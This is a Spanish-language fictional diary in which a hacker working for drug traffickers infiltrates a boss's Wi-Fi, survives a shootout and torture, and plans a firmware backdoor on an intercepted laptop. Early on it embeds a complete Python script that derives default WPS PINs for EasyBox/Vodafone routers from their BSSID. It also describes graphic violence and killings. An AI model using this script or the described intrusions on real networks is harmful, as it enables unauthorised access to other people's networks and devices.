- Apple, siempre incompatible - y sonreí
Entré a la sala de la casa donde me pasaron; y me indicaron con señas que me sentase. Acto seguido me preguntaron si quería algo para beber, pedí un bourbon y esperé.
Unos 10 minutos más tarde apareció, justo como lo había visto en el expediente. Al pasar frente a mi saco una escuadra bañada en oro y la puso junto a mi Colt.
- Buenas
- Buenos días - dije, al mismo tiempo que me ponía de pie y le extendía la mano
- Una persona con educación, me alegra
- Gracias
- ¿A qué debo el honor?, me estuvieron buscando un par de contactos para esta cita. Sin querer ser grosero a mi me gusta atender rápido, ¿qué puedo hacer por usted?
- Tengo un negocio en Mexicali, y estoy buscando quién me distribuya
- Hay gente en Tijuana, en San Diego; incluso en Tecate
- Busco un precio más accesible; creo que el público al que voy dirigido no es exigente. Puedo maximizar mis ganancias vendiendo una mercancía de menor valor
- ¿Discrimina a su propia clientela? - parece que eso le molesto, debía tener más cuidado
- Soy un hombre de negocios; no es discriminación, es una segmentación de mercado - saqué mi laptop y se la mostré - ¿puedo?
- Adelante
Querido Diario… no puedo describir la sensación que en este momento tuve, un agujero en estomago del miedo. Al momento de abrir la computadora para mostrarle un par de imágenes, por debajo en una terminal se empezó a ejecutar algo.
import sys, re
def gen_pin (mac_str, sn):
mac_int = [int(x, 16) for x in mac_str]
sn_int = [0]*5+[int(x) for x in sn[5:]]
hpin = [0] * 7
k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) & 0xF
k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) & 0xF
hpin[0] = k1 ^ sn_int[9];
hpin[1] = k1 ^ sn_int[8];
hpin[2] = k2 ^ mac_int[9];
hpin[3] = k2 ^ mac_int[10];
hpin[4] = mac_int[10] ^ sn_int[9];
hpin[5] = mac_int[11] ^ sn_int[8];
hpin[6] = k1 ^ sn_int[7];
pin = int('%1X%1X%1X%1X%1X%1X%1X' % (hpin[0], hpin[1], hpin[2], hpin[3], hpin[4], hpin[5], hpin[6]), 16) % 10000000
accum = 0
t = pin
while (t):
accum += 3 * (t % 10)
t /= 10
accum += t % 10
t /= 10
return '%i%i' % (pin, (10 - accum % 10) % 10)
def main():
if len(sys.argv) != 2:
sys.exit('usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py 38:22:9D:11:22:33\n')
mac_str = re.sub(r'[^a-fA-F0-9]', '', sys.argv[1])
if len(mac_str) != 12:
sys.exit('check MAC format!\n')
sn = 'R----%05i' % int(mac_str[8:12], 16)
print 'derived serial number:', sn
print 'SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c' % (mac_str[6], mac_str[7], mac_str[8], mac_str[9], sn[5], sn[9])
print 'WPS pin:', gen_pin(mac_str, sn)
if __name__ == "__main__":
main()
Mientras intentaba sacar el PIN de WPS de la red le mostré unas imágenes.
- Miré, esto es el Nuit, un antro donde tenía ciertas posiciones. Cerró hace un tiempo, pero aquí podía vender mercancía de la Ciudad de México con buenas ganancias. Este, es el Sport's Bar, justo aquí vendo mercancía de Tijuana y San Diego; este de aquí, es el Relajo, es el mercado que quiero segmentar. Es en donde creo que puedo vender lo que para usted es merma, serán ganancias netas en este tipo de mercado
- Hum... - mientras veía las fotografías tenía miedo de que de pronto resultase que sabía como funcionaba OS X y abriese mi Terminal que se ejecutaba en segundo plano
Me regresó la computadora. Y se recargo, mientras yo mantenía la pantalla abierta. Entonces apareció .
- ¿Me permite? - saqué un cuadrito de cargador - Adelante
Lo que le no sabía es que este cargador, en realidad era una cámara de 16 GB con wifi integrado. Que de un lado tenía un pequeño hoyito por el cual grabe el PIN que Pao ya había visto en tiempo real.
Al mismo tiempo abrí un Kali virtual y conecte con un MAC Address de iPhone mi computadora. Estaba dentro.
- Me parece bien... creo - dijo al final
- Mire, no es necesario que lo decida en este momento. Pero soy una persona de negocios, he desarrollado aquí detalles de la distribución y ganancias. Le dejó este archivo donde está todo en este disco duro. Véalo en cuanto pueda
- Gracias - dijo mientras tomaba el disco duro, deme un día. Lo veo mañana a esta misma hora
- Con todo gusto - me levante y me despedí de forma muy respetuosa, metiendo mi dedo incide entre la pantalla y el teclado para evitar se bloquease.
Caminé lentamente, me regresaron mi arma y subí al coche mientras hacía como que acomodaba mis cosas en la cajuela. Las personas me trataban ya de diferente manera al ver que me había dirigido a su patrón. Entonces, lo vi… lo tenía, había abierto el archivo. Sólo unos minutos después de darle el disco.
Volví a acercar la cámara para que Pao del otro lado lo pudiese copiar; entonces dejé caer un celular con Nethunter entre unos árboles; que previamente había preparado, me subí al coche y maneje de forma lenta pero lo más rápido que podía.
Seguí manejando hasta la carretera, y apenas pasé unos cuantos kilómetros aceleré lo más que pude hasta un Starbucks.
- ¿Lo tienes?
- Se esta rompiendo - dijo Pao - ¿tú tienes acceso al Nethunter?
- Si, estoy dentro... sólo necesito el hash
- Ya, va, ya va... ya... ¡ver%&/! - y vi aparecer en la pantalla de mi celular el password
Entre usando como jump box el Nethunter, copié la información que me había pasado Mauricio. Cerré la computadora y salí corriendo hacia el estacionamiento. Fue entonces cuando supe que algo no estaba bien; vi los dos coches, abrí signal y grabé un audio.
- Pao, sal del hotel ¡ya!, ve al aeropuerto.. locker A-118, 68421325 fue un placer conocerle, señorita Casas
Vi como se abrió la puerta, no distinguí que rifles eran; pero no había espacio para dudas. Pensé se habrían dado cuenta al encontrar el Nethunter, o que aunque hubiese WPS tuviesen algún filtrado por MAC. Las variables eran muchas, miré de reojo que no hubiese gente en medio; desenfunde, frente en alto, respiración lenta, presione mis labios entre si… y disparé.
Mi primer tiro entró por la ventanilla, pegó en el hombro de quién estaba detrás y pude ver el chorro de sangré votar sobre el parabrisas. Desenfunde mi segunda gemela, quité seguro y le di a la pierna de alguien que se me acercaba por la izquierda, giré la primer gemela y le apunte al brazo con que sujetaba el rifle. Fallé, pero le di al hombro y eso lo hizo soltar el rifle. Entonces se abrió un coche frente a mi, vi a dos tipos cubrirse a los extremos y fue cuando cometí el error. El impulso me hizo abrir mi posición para alcanzarlos a 270 y 35, buscando preveer la entrada. Fue cuando vi girar a alguien con casco; la impresión me hizo fallar, apunto y sentí el golpe… sé es una tontería, porque no es posible. Pero podría jurar que sentí los seis impactos caer uno detrás de otro sobre mi. Pasé de 270 y 35 a cero; y, aunque jamás lo hago, apunte al caso; vi como le pegué de secó y lo derribe; entonces el tipo al que le había destruido el hombro me acabó… volví a sentir otra línea corta en un costado; y al intentar pasar a 230 de 180 recibí una tercera línea; perdí el equilibrio y entre mezcla de dolor, cansancio, la sangre acumulada en la boca y tranquilidad; caí…
Querido Diario… soñé que su casa era una habitación pequeña, como si fuese una esquina en Puerto Madero. Por dentro era completamente de cristal y podía ver a todos; por fuera era una pared normal. No se parecía a su casa, pero… sabía que era su casa, era su cama; estaban los búros. Aquel con que golpeé la frente.
En mi sueño me senté sobre la cama; tomaba su colcha café y la olía… olía a ella.. tenía su aroma; olía a esa sudadera que siempre tenia debajo de mi almohada para sentirle cerca. Cerraba los ojos y me recostaba.. entonces de pronto escuchaba su voz. Le vía estar a punto de entrar, miraba hacia todos lados buscando donde esconderme; fue cuando desperté.
El dolor era demasiado intenso, de esa clase de dolores que ya no sientes nada; de lo fuertes que son. Estaba colgado; tal vez a un metro sobre el suelo. Tenía los brazos colgados como si estuviese crucificado y tenía una viga entre los brazos. Las piernas las tenía juntas pegadas con cintas de plástico, como las que ponen en los aeropuertos; y de los pies tenía una cuerda que iba amarrada a otra que tenía en el cuello. Sentía todo el peso de mi cuerpo en la columna, la sentía partirse del dolor y estar entumido.
No veía nada alrededor; tenía tanto sudor que se me metía a los ojos y me ardía; no veía nada. Pero distinguí el rifle… no habían sido ellos. Era un rifle diferente, especial… correlacioné el modelo de rifle con la forma en que estaba amarrado. Ya sabía quienes eran.
Entro el tipo del casco. Debía tener unos 35 años, más o menos mi estatura; a pesar de que llevaba uniforme se notaba lo musculoso que estaba, ojos verdes…
- Buenas
- Holii - dije, con sarcasmo
- ¿A quién reportas?
- Necesito hacer una llamada interna con clave
Se sentó frente a mi, y alguien más abrió la puerta y entregó una carpeta blanca de unas 500 páginas. Yo había visto esa carpeta hace mucho.
- ¿Qué? - me dijo, mientras abría la carpeta
- Nada - Si, adivinaste... no necesitas la llamada
- ¿Estoy detenido?
- No
- Bien, esto del yoga está interesante pero... me quiero ir
- Si, sólo... - hizo una larga pausa, este tipo era alguien que se sabía hacer mandar, y le gustaba mandar - gracias
- ¿Por?
- Llevaba unos 7 meses intentando encontrar algo; y no pude... todo estaba bien manejado por un contador. Pero, tu pudiste... primero pensé que era falso; como fuese lo iba a usar. Pero luego lo pasé al Jefe, lo mandó a analizar, correlacionaron algunas reglas de lavado de dinero y... nos dimos cuenta, que son reales. Es evidencia sembrada, pero real.
- Si ya sabes quién soy, entonces sabes que nosotros nos basamos en información
- Si, mis felicitaciones... tienen cosas que nosotros jamás podríamos
- ¿Ya me puedo ir?
- No
- ¿Por?
- interferiste en mi tarea
- Hum.. creo que no, creo que la hice más fácil
- Con tanto ruido se fue el objetivo a EEUU. No quiero ser injusto, no fue tu culpa, fue más nuestra. Pensamos que jugabas con él y apresuré las cosas, fallé y lo asusté
- Lo buscaré entonces, nosotros.. bueno, ya sabes... somos turbios e ilegales, no tenemos fronteras .
- Lo sé, pero aun así no me agradas del todo - sacó otra viga, igual a la que estaba amarrado - me hiciste ver como un pen$%&/; no te puedo matar, pero supongo entiendes como se comporta un caballero, y tus jefes sólo sabrán que platicamos un rato
Sentí el golpe directo, y escuché el sonido de la costilla… en otro momento habría llorado, pero allí no podía. Caminó hacia la puerta y le dio la viga a un tipo que estaba cuidando, el mismo que había llevado la carpeta.
- Tu vuelo sale a las 6:10am, son las 3am, aquí no es como en "México", aquí llegas a las 6am y estas a tiempo... pero no te preocupes. Te llevaremos a las 5am; mientras... Vélez, dame cinco cada 15 minutos sobre esa misma costilla con la viga de 5 pulgadas - y salió, no lo volví a ver.
No resistí más de dos rondas cuando me desmayé.
Cuando desperté iba en una camioneta, tenía ropa diferente a la que vestía; el dolor era intenso. Por el espejo retrovisor miré a quién manejaba, me vio cuando me empecé a mover de reojo, y volví a mantener la vista al frente.
Llegando al aeropuerto me abrió los seguros de la puerta y bajé, apenas me moví sentí horrible. Entré y fui directo a hacer el check in. Caminé hacia la sala y lo primero que hice fue entrar al baño. Tenía miedo de levantarme la playera, he escuchado cosas horribles de ellos. De las tres unidades, sé que ellos son los más carniceros. Escuche de alguien a quien le abrieron la panza en canal y le sacaron todo, luego le aislaron los pulmones de forma quirúrgica y lo llenaron de miel para abandonarlo en un lote valdio donde las hormigas hicieron su parte, pero tuvo que resistir horas de sufrimiento así.
Al levantarme la playera sólo vi mi cuerpo enegrecido, eso no eran moretones; estaba negro completamente. Subí al vuelo, cerré los ojos y el cansancio y el dolor me vencieron.
Nos vi a ambos caminando sobre la avenida de Aguascalientes que va hacia la iglesia, vi su sonrisa y cuando me platicaba lo mucho que le gustaban los edificios. “C… para ustedes esto es normal, pero en Mexicali no tenemos edificios así”, y era verdad, Mexicali es una ciudad muy nueva, no tienen edificios coloniales. Su acento, su aroma… soñar te hace hasta recrear el aroma de las personas.
Sentí el golpe del avión al aterrizar, bajé como pude. A cada instante el dolor aumentaba y al salir me encontré a Mercado y Faustino en la sala de espera. Tomaron mis cosas, y Mercado me dijo al oido.
- No sé si nos están viendo, tengo la camioneta aquí fuera, por favor; haz un esfuerzo y camina normal. Ya casi.
Manejaron sobre todo Circuito Interior, la avenida que tantas veces le dije “no importa desde donde vengas, si llegas a esta avenida llegas a mi casa”. Y en Misterios tomaron Reforma, llegamos a su oficina cerca del Sheraton y me ayudaron a subir. Al llegar había cinco médicos esperándome. Uno de ellos me ayudo a acostarme en un diván y me inyecto algo; volví a quedar dormido, pero está vez fue tan profundamente que el sueño me venció y no soñé nada.
Desperté después de unas seis horas, pero sentí como que había dormido días. Vi a Mauricio a un lado.
- Mocoso - le dije sonriendo. Mauricio es de esas personas que me ven como si fuese un héroe... por eso lo trato así
- Señor
- Pásame un Red Bull
- No creo que sea eso muy bueno
- ¿Estoy vivo?
- Si señor
- Entonces es bueno - y nos reímos
Me incorporé como pude, y me pasé del diván a un sofa; busqué mi celular y Mauricio se apresuró a darmelo. Lo había puesto a cargar, le marqué a Pao.
- Bueno
- Belindo, ¿qué pasó?, ¿donde estas?
- En la ciudad, estoy bien, ¿tú? - Si, llegando al locker aparecieron personas amigas de Mom y me trajeron en otro avión para acá
- ¿Shellcode?
- Aquí conmigo
- La vida criminal requiere de secretos... esto queda entre tú y yo, ¿vale?
- Vale - Te veo en un rato o mañana, depende
- Cuídate mucho
Mauricio iba subiendo con una bolsita de Starbucks, se sentó al lado de mi y me la dio.
- ¿Y tú? - lo miré con la cara de regaño de siempre. Tome el pianidi y le di la mitad, me paré y tomé una taza y le serví también la mitad del café - ten, brindemos por la maldición
- ¿Cual maldición?
- No puedo morir
- ¿Qué?
- ¿Sabes?, yo soy ateo, o era ateo... pero he llegado a creer que Dios existe; y me odia, me odia tanto que me dio una suerte inexplicable que me impide morir
- No entiendo
- Ni yo; pero creo que quiere hacerme sufrir; Dioses, todos son iguales. Come, estos cuando se enfrían saben feo
Comimos en silencio hasta que aparecieron Mercado y Faustino.
- Míralo, como si nada... este cab&/() es increíble - dijo Mercado sonriendo - por eso se lo he intentado comprar a Mom, pero no me lo da
- ¿Cómo estas? - me preguntó Faustino, siempre serio, con ese semblante de militar corrupto y retirado
- Fallé, me dijeron que huyo a EEUU
- Si, ya lo estamos siguiendo. Esos pen$%&/() la ca$%&/( y se metieron antes. Pero ya nuestra gente lo está siguiendo, volveremos en una semanas a intentarlo
- Nunca te escondas en EEUU, la gente es mucho más corrupta que en México, allá te venden por cristal - dijo Mercado - y dime C... litos, ¿qué podemos hacer?
- ¿Para qué? - Te metimos en un enredo fuerte - Mercado siempre se la pasa tan sonriente que me asusta - ¿$10 millones están bien?
- ¿$10 millones?
- Bueno, tú dime el número
- No me debes nada - Bueno, pídeme algo... cualquier cosa que este en mis posibilidades te la daré - yo no quiero algo.
- ¿Conoces a Belinda?, ¿o puedes clonarme una? - y se rió - un vuelo a Mexicali por Aeromexico en primera clase y un boleto para mi perrita; el más próximo posible
- Bien - ¡Ah!, Mercado... si quiero algo
- Lo que quieras
- Un mouse bluetooh de Apple color gris
- ¿En serio?
- Si, es mi precio
Al llegar a Mexicali, Mauricio me llevó directamente al hospital, aun me sentía muy mal, algo mareado. Sólo recuerdo que me quitaron mis cosas, me pusieron una bata y me dejaron en una habitación. Volví a dormir una vez más.
Recordé cuando encontré su libreta… la vi y sentí que no debía de abrirla, que tal vez sería algo personal. Pero la curiosidad me ganó, entonces leí la primer página: “había besado a mi mejor amigo”, sonreí. Tomé una foto y se la envié, creo que ella no pensaba dejar la libreta. Me recosté en la cama y seguí leyendo hasta que vi el dibujo. Su idea de lo que era un hogar, el sol, los columpios, el pasto, la casa pequeña…
- Agua... - dije quejándome de dolor, pero no había nadie que me diese agua.
Pasaron muchos días, muchas noches… desperté. Mauricio estaba allí.
- Señor, ¿cómo se siente? - preguntó, con verdadera cara de preocupación
- Bien, vámonos a casa
- Si señor - me vestí y bajamos las escaleras, hacia la recepción
- ¿Qué clase de clínica del tercer mundo es esta?, ¿tú jefe no pudo de menos hospitalizarme en el ISSSTE?
- Es el mejor hospital de Mexicali señor, recomendación de Don Kiko
- Hum... hasta un centro de salud está mejor que esto
En la recepción pregunté por la factura.
- Ya esta pagada señor
- ¿Quién la pagó? - pregunté, no muy sorprendido; entonces Mauricio me dijo
- El dueño del hospital es amigo del señor Mercado, de cuando vivió aquí
- ¿Me podría decir el monto por favor?, sólo por saber - le dije a la recepcionista
- Si señor, $118, 140 ¿gusta que se lo desglose?
- No, así esta bien; gracias - saqué mi celular para hacer la transferencia a Mercado
- Señor, no necesita pagarlo
- El secreto, muchacho; es que los poderosos te deban favores a ti, no a tú a ellos - abrí mi banca en línea
- ¡Bueno!, hay veces es las que hay que dejarse consentir... si Mercado paga, Mercado paga - creo que tengo un problema económico
Llegamos a casa, y lo primero que hice fue abrazar a Shellcode. Entonces, mi celular sonó.
- Hola
- Hola
- ¿Qué onda?, ¿cómo estas?
- Bien
- Que bueno, ¿estas ocupado?
- No - cerré los ojos esperando algo muy malo, sinceramente, no quería ir a ningún sitio por ahora
- ¿Recuerdas el negocio en el desierto?
- ¿Tenemos un negocio en el desierto?
- No tu desierto, otro desierto
- ¡Ahhh! si, ya sé cual... ¿qué pasó?
- No va a caminar, no va a caminar... este pen$%&/( de Marcos me jugó chueco
- Ouuu... eso es malo. Supongo implica también el del otro desierto y el del pueblo
- Si, pero ya los ando negociando en paralelo por mi cuenta; le vamos a dar un madruguete. Pero necesito un favor - volví a cerrar los ojos y apreté a Shellcode aun más fuerte
- ¿Cual?
- Esta me la voy a cobrar, pero tiene que dolerle y dolerle mucho. Necesito propuestas de que hacer
- Ok
- Algo muy importante, con tanto movimiento no sé quién está conmigo y quién no; entonces cualquier cosa que operes tú o cualquier cosa que hagamos, necesito que sea independiente de nuestros contactos. Confío en ti y en nuestra gente, en nadie más. Por ahora nos sentamos con todos, pero con nadie trabajamos, ¿correcto?
- Si
- Bien, si te limitas de recursos lo vemos
- Ok
- Excelente, gracias.
Que horror, tomé el celular y marqué a alguien turbio e ilegal de mi entera confianza; no podía ni moverme, esta vez mejor iba a lo seguro.
- Bueno
- ¡Joven, estas vivo!
- Ots
- Ya dime joven, ¿a quién le vendiste tu alma?
- ¿A Mom?
- No joven, lo digo en serio... ¡14 tiros!, ¡14!, ¡no ma$%%& joven!, y ni uno sólo te entró... eso no es real joven
- Hum... ¿Paola te dijo? - Si, dice que básicamente nos des unos números para el Melate. ¿En donde compraste ese chaleco?
- Jajaja.. en Ebay.. en las rebajas de Cybermonday
- ¡Joven!, algo tienes
- Es la maldición, ya te lo había dicho... ¡joven!, tenemos trabajo
- ¿Ahora a quién hay que ir a darle tehuacanazos?
- Marcos, el tipo que andaba muy cercano a Mom
- ¿Ya bailó Bertha?
- Si
- ¿Qué hay que hacer?
- No sé, pero tiene que sufrir
- Yo me encargo
- Aun no, primero hay que pensar.. luego vemos
- Huuuu.. *guardando sierra eléctrica*
- Gracias, nos vemos pronto
- ¿Qué tan pronto?
- Espero no muy pronto, digamos que no puedo moverme.. estoy a nada de traer una cubetita y ponerle al lado de la cama para no levantarme al baño
- #estacab$%&esep$%& ... ¡14!, Satanas debe tenerte ya en las llamas del infierno
- Hum... mi teoría es que es el otro, el de competencia...
- Sale joven, nos vemos...
- Bye
Vi la cara de Shellcode, parecía que me decía “Humano, no quiero que te pase nada”. Mauricio se me acercó con un jugo de naranja. Parecía que tenía algo que decirme y no se atrevía, respiró y empezó a hablar.
- Señor, necesito de su ayuda
- ¿Ahora que tragedia pasó? - y me dio una screenshot impresa, ¿por qué alguien imprime una screenshot?
- No entiendo
- Detectamos a alguien que intento entrar a los I3 para robar un reporte
- ¿Y?
- Fue desde la red interna
- Pero ustedes son cuatro, no me digas que no pudieron saber quién es
- El problema es que es Linux... Android...
- Tú eres el único friki
- Si, soy el único que usa Android
- Revisa tus logs en el AP, si ya es tarde pon tablas estáticas - Mauricio calló y se recargo en la pared - igual puedes mostrar tu memoria, y disco duro. Yo hablo con Faustino y Mercado
- ¿Me puedes ayudar? - es la primer vez que me hablaba de tú
- Tú no quieres que te ayude a demostrar que no fuiste tú... ni a defenderse... - negó con la cabeza - tú quieres que te ayude a encontrar quién fue - y asentió
Me senté en el suelo, a su lado… y le indiqué con la mano que se sentase también; Shellcode se acercó y se acostó en mi regazo
- ¿Qué quieres?
- Mi papá tiene diabetes, con varias complicaciones; incluyendo hipertención... ¿sabes cuanto ganaba desbloqueando celulares?, si bien me iba unos $500 a la semana. Con eso no pago un hospital, yo no podría pagar ni siquiera uno barato como donde estuviste internado. Esto es un negocio de confianza. Todos saben que el señor Mom te ama porque confía en ti, siempre habla de ti con todos sus socios, no confía en nadie más que en ti; Mercado confía en el señor Faustino, en los demás no. El señor Faustino tiene un Cadillac, una casa con alberca... yo sólo necesito una medicina de $1000 cada mes, y pagar el hospital
- Ven
Me levante, con mucho trabajo; me dolía todo, y lo llevé a mi habitación, saqué un folder del escritorio y le di mi cédula.
- ¿Estudiaste?, ¡eres del Politécnico!, ¡de ESCOM!, eso signific...
- Tengo trabajo asegurado en donde sea.... si lo sé - interrumpí - siéntate. Mi ultimo trabajo normal fue en una empresa llamada Softtek, revisaba la seguridad de aplicaciones, y ganaba $80 mil al mes para cuando renuncié, justo me acababan de hacer líder global de un área de consultoría... ¡$80 mil! por no hacer prácticamente nada. Conozco amigos que son desarrolladores, ganan unos $50 mil al mes; la gente de SAP $100 mil hasta $150 mil... el último trabajo que me ofrecieron cuando vivía en la ciudad fue de $400 mil, ¿sabes por qué?, por dirigir su área de pentest, justo lo que más me gusta en el mundo... tanto dinero por divertirte todos los días.
- Pero para eso hay que estudiar
- Exacto... pero con eso si pagas el hospital, ¿no? - acariciaba a Shellcode mientras se lo decía - yo no elegí esto, jamás lo elegí... pero es mi única opción... no dejes que sea tu única opción
- Per... - lo interrumpí
- ¿Tienes idea de quién pueda ser?
- No, el señor Mercado tiene muchos enemigos, tantos que no podría contarlos
- Hum... le voy a pedir a Fab que me ayude a determinar posibles sospechosos
- ¿Fab?
- ¿Crees que trabajo sólo?... todos confían en mi, es cierto... ciegamente; no entiendo porque. Justo la única persona que quería confiase en mi, no lo hizo... pero todos los demás si. Pero la realidad es que nadie debiese de confiar en mi, yo no soy... hay muchos a mi alrededor, en quienes yo confió. Fab es mi especialista en inteligencia, tiene a un equipo turbio e ilegal que se dedica a encontrar lo que sea
- Entiendo
- Luego que tengamos una lista veremos que hacer
- Gracias
- Prométeme una cosa
- Lo que sea
- Con el dinero que te pagará Mercado por esto, vas a estudiar; y te vas a alejar de ellos. Yo hablaré con Mom para que te dejen ir
- ¿Mom?
- ¿Confías en mi?
- Si - Bien.. déjame todo a mi
- Gracias
- Los amigos no agradecen... - me puse de pie - ¿te gusta la carne?
- Si, la arrachera
- Hum... Mauricio
- ¿Si?
- Me caes bien... vente, vamos a comer, yo invito
Fuimos a comer a Baires. Comimos carne, vino, chinchulines, empanadas. Mauricio comía como niño de hospicio. Era obvio, creció en un sitio igual que yo. Después fuimos por café. Estaba más relajado.
Mientras comimos y bebimos me platicó de como empezó a hackear celulares, “hackear”. Los foros que frecuenta, los chats; le platiqué de IRC, de los Meetings 2600, de la escena; le platiqué de un shellcoder con el pelo erizado que amaba reducir y eficientar sus shellcodes, que inyectaba procesos tan meticulosamente que tenía shellcodes de 12 bytes.
Me ayudó a abrir la puerta, me seguía… me sigue doliendo todo. Cuando fuimos a Starbucks nos encontramos a esa muchacha de pelo colorido leyendo; le piqué la costilla y le presenté a Mauricio como un compañero del trabajo. Luego me acompañó a irlo a dejar al aeropuerto. Pagué el cambio de su boleto a primera clase, creo que Mauricio es una buena persona; necesita sólo un empujón.
Me despedí de él, con la promesa de que yo me encargaría de todo. De vuelta pasamos por un helado. Platicamos un largo rato, luego me pidió llevarle a su casa.
- Augusto, ¿te puedo preguntar algo?
- Hum... chica, y mi color favorito es el rojo, aunque no tengo nada rojo; 30 de pantalón, 27 de tennis; uso boxers, también chicos y el perfume que uso se llama Azzaro Wanted
- ¿Eh? - se empezó a reir
- ¿Que no me ibas a regalar algo?
- Hum... ¿te puedo dar un abrazo?
- ¿Por que?, no es mi cumpleaños; a ti no te gustan los abrazos
- Te lo debo desde tu cumpleaños pasado, y ya casi es el nuevo
- ¡Ahhh cierto!, ok - no entendí nada, pero sacó una bolsa y me dio el mejor regalo que he tenido, desde que Lalo me regalo una licorera de metal (si Lalo lee esto me va a matar)
- ¿Por qué?
- ¿Quién soy? "because you fall me very good" - y me reí - ¿es tu Doctor favorito?
- Si, y el del plátano.. y luego el macho, mujeriego y vividor que terminó enamorado por siempre de Rose
- Creo que te considero mi amigo; por cierto, hueles muy rico
- Empiezo a preocuparme, pero gracias... you as well as fall me very good... - esto es raro
- Me too, see you cyberterrorist; ¿comemos el lunes?
- yes
Querido Diario…
Dicen que la tercera es la vencida, y esta es la tercera ocasión en la que estoy tan cerca… y la maldición me volvió a salvar. Fue un mal viaje.
Si, el Primer Doctor es mi favorito, siento que para los 50’s era como muy raro usar un humor tan bobo para que fuese chistoso, pero lo hacia; además es el gruñón. Después de ese, creo que sería el Noveno o el Décimo; por machos, mujeriegos y vividores.
Habían sido unas semanas muy largas, tomé el teléfono e hice la última llamada del día…
- Hola - ¿Qué tranza chavo?, ¿estas algo así como muerto?
- Hum...¿qué Paola no entiende lo que es un secreto?
- Jejeje...
- Necesito un favor
- ¿Qué tranza?
- Necesito encontrar a los probables enemigos de Mercado
- Jajaja no pues, ¿qué te digo?, a ese hasta su vieja lo quiere matar
- Si, pero alguien más pro. Entraron a su red e intentaron sacar un reporte
- Hum...
- Necesito algo de inteligencia. Entre todo el Facebook Bronco Investigeishon team encuentren algo, por fa.. lo que sea que nos pueda ayudar
- Veré que puedo hacer por la causa
- Gracias
- De nada joven, ponle doble llave a tu casa, no vaya a ser que te vayan finiquitar
- Hum... ñeeee
Shellcode se acercó y se paró en el borde de la cama… quería salir a pasear. ¡Oh diablos!.
Querido Diario… me duele todo; no puedo ni girarme. Este post tiene mucho porcentaje de realidad… exceptuando la rubia, güera, alta y pechugona.
Arribe a Morelia por la mañana, había tenido que salir en el primer vuelo de Mexicali hacía Guadalajara, y de allí tomar un helicóptero hacia Morelia. Antes de eso, pasé a dejar a Shellcode encargada, le compré un bulto grande de croquetas, y sus bocadillos con forma de chuleta que tanto le gustan. Es una buena perra… muy cobarde, pero es una buena perra.
Al llegar al campo de aterrizaje me esperaba Faustino, al quien al bajar salude de forma muy efusiva, teníamos varios meses de no vernos.
- ¿Cómo estas?, ya te hacia muerto en la nieve
- Nah... me dieron unos tehuacanazos con chile piquín por unas 10 horas, pero... nada más. Los güeros no saben nada de nosotros
- Eso escuche, que regresaste como si nada
- ¿Y tú?
- Yo ya no estoy para eso, ya casi tengo cincuenta y... ya va siendo tiempo de quitarnos la medallita de héroes, ahora si, a ganar dinero. Que de todas formas los pen%&/( escogen a quién sea
- Pues si... - rompí el momento emotivo - ¿qué me tienes?
- Con tu hackeo lo ubicamos en sus casas de seguridad y mapeamos su ruta; solamente necesitamos asegurar que va a estar en la ruta, pero fuera de eso creo que lo tenemos
- No podemos simplemente confiar en sus horarios; puede cambiarles en cualquier momento; es muy paranoico. Debemos encontrar una forma de trackearle
- Estamos interceptando algunas cosas que van a su oficina por DHL
- ¿Cómo que cosas? - pregunté
- Cosas normales, papelería, laptops, no sé... podríamos meterle una cámara
- No, eso es muy obvio
- ¿Que tienes en mente?
- ¿Laptops?
- Si
- Vamos a instalarle un juguetito - interrumpí - pero primero, prioridades. Vamos por unas carnitas.
Fuimos a comer a un puestecito cerca de los arcos. Morelia es muy bonito, no dejes de visitarlo en Día de Muertos; y la comida es deliciosa.
Comí con el equipo de Faustino; a pesar de que durante mucho tiempo sirvió a intereses de gente muy poderosa y entreno en diferentes áreas de inteligencia; no le gusta colaborar con mucha gente. Siempre contrata gente de bajo perfil que, básicamente, sólo sabe hacer una cosa. Jalar el gatillo, y hacer pozole con la competencia (espero tú me entiendas cuando digo el término pozole).
Terminando de comer fuimos a su casa de seguridad; bastante fea pero con escondrijos suficientes para entretener un tiempo a un comando armado que entrase y poder sacar a la gente importante. Pasé y me encontré a Mauricio.
Mauricio es prácticamente un niño de 15 años que sacaron de arreglar celulares en la Plaza de la Computación, no tiene talento alguno, pero quiere ser un criminal y aprender; dice que se facilitan estas cosas, pero hum.. ñeee… yo no confiaría mucho mi vida en él.
- ¿Cómo estas vendetta?
- Bien, ¿tú qué tal?, ¿cómo te trata el gordo?
- Bien, bien... estamos aprendiendo
- A ver las manos - le giré su mano derecha con la palma hacia arriba - ¿cuantos?
- Dos, se pusieron difíciles y pues, el señor Faustino me hizo deshacerme de ellos. Ya sabes
- Hum.. a tu edad yo soñaba con grandes cosas, deberías replantearte lo que haces - diablos, ya doy consejos. Estoy viejo.
Mientras intentaba salvar el alma condenada al infierno de Mauricio apareció Faustino.
- ¿Entonces que haremos?
- Dame una de las laptops que interceptaste, la más bonita de todas
- Tengo que Dell, i7, 4 TB, 32 Gb de RAM
- No, no... esa no es
- Es la mejor
- Por eso, esta sólo la usaría un ñoño... esta - y tomé una laptop pequeña
- Pero esta muy chafa - dijo Mauricio
- ¿No la usarías?
- No señor
- Exacto tú eres un nerdo, por eso mismo. Esta es la que usaría él - sentí el corazón de Mauricio partirse en dos, pero... alguien se lo tenía que decir - vamos a instalarle un backdoor pero no con software. Tiene un equipo de seguridad guatemalteco, deserteros de los caibiles, muy bien entrenados. Así que tenemos que ser hábiles. Un backdoor en el firmware
- ¿Y luego?
- Leeremos todo, veremos todo, sabremos to-do
- ¿Nos pueden rastrear?
- Si
- ¿Sabes quién es?
- Si
- No sé si eres muy presumido, eres muy bueno o te quieres morir
- Las tres
- Esta bien, ¿qué necesitamos?
- Abrir la computadora, conectamos este aparatito al BIOS, instalamos el firmware, cerramos, y terminamos - les dije mientras mostraba mi modificador de firmwares (lo siento, es el mejor nombre que se me ocurrió)
- ¿Así de fácil? - preguntó aun dudando Faustino
- Así de fácil
- ¿En que te ayudamos?
- Bueno, necesito unas manos... las tuyas - le dije a Mauricio - tienes que abrir la computadora por mi
- ¿Por qué? - preguntó
- Ouuuu mis manos son muy suavecitas, no fueron echas para estas cosas
- ¿No?
- No, fueron echas para tomar cosas...
- ¿Qué cosas?, ¿celulares?
- ¡Ay niño! - mis ojos le dijeron todo a Faustino, Mauricio no iba a durar en este mundo turbio e ilegal - Ten - y le di la computadora - abrela primero y saca ese fierrito de allí que cobre el fierrito de acá
